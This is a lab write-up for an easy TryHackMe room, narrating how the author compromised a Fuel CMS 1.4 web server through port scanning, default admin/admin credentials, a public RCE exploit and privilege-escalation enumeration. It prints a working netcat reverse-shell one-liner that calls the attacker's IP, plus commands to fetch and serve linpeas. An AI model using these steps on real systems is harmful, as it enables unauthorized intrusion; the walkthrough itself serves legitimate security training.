Another room from TryHackMe focusing on exploiting an RCE and Default configuration. The room is rated as Easy on the platform. The room can be accessed here.
As per the room description, we have a newly deployed Web Server and there seems to be issues with the web server configuration. We are supposed to find the user and the root flag. Let’s start with the steps performed by me to own the servers. The target server IP is 10.10.69.97 and the attacking server IP is 10.13.15.113
I started with rustscan to quickly find ports open on the server. rustscan -a 10.10.69.97. Only port 80 was found to be open on the target server.
On further service enumeration,we found Apache httpd server available on port 80. The Apache httpd version has been detected as 2.4.18 and OS has been detected as Ubuntu.
I ran directory brute-forcing on port 80 to find if any leakage through the sensitive files. I used dirsearch to perform directory brute-forcing. The result indicated that the robots.txt file is present and on further enumeration of the file, we found we have /fuel/ which has been marked as disallowed.
On loading the webpage, the login prompt was presented. Based on the community result, I got the default credentials as admin and admin. I attempted to login and it did work. Further enumerating, I found the Assets option menu which had upload capability. After playing for some time with the extension bypass, I had to give up as I did not find luck with available options.
Since from the default page, I was able to find the CMS version which was 1.4, I searched if any public exploits available on ExploitDB. Fortunately, there were two exploits available, one was based on Ruby and the other on Python 2. I picked the python2 script and modified it to support python 3.
After gaining an initial foothold on the server by exploiting the RCE vulnerability, our task is to gain a shell and then look to escalate the privilege.
To gain a reverse shell, I got the command from Revshells.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.15.113 4445 >/tmp/f
Once I had a reverse shell, I used python one-liner to get a more stabilized shell.
Now I aimed to look out for ways to escalate the privileges. I ran linpeas.sh by transferring the file to the target server. I got the linpeas.sh from GitHub using the below snippet.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh > linpeas.shsudo python -m http.server 80 # Executed on my machine to create a web server serving linpeas.sh script. Ensure to have file in same directory from where launching http server.wget 10.13.15.113:80/linpeas.sh
Once I had the script, I ran it to enumerate and find if any entry point available. I did not find any direct hit but got to know that configuration files are present for CMS. Also per the default installation, the credentials can be found in database.php
This room could show how things can go wrong if servers/devices are deployed with the default setup. It is always advisable to change the default parameters as per the Industry Best practices and then deploy them in the production environment.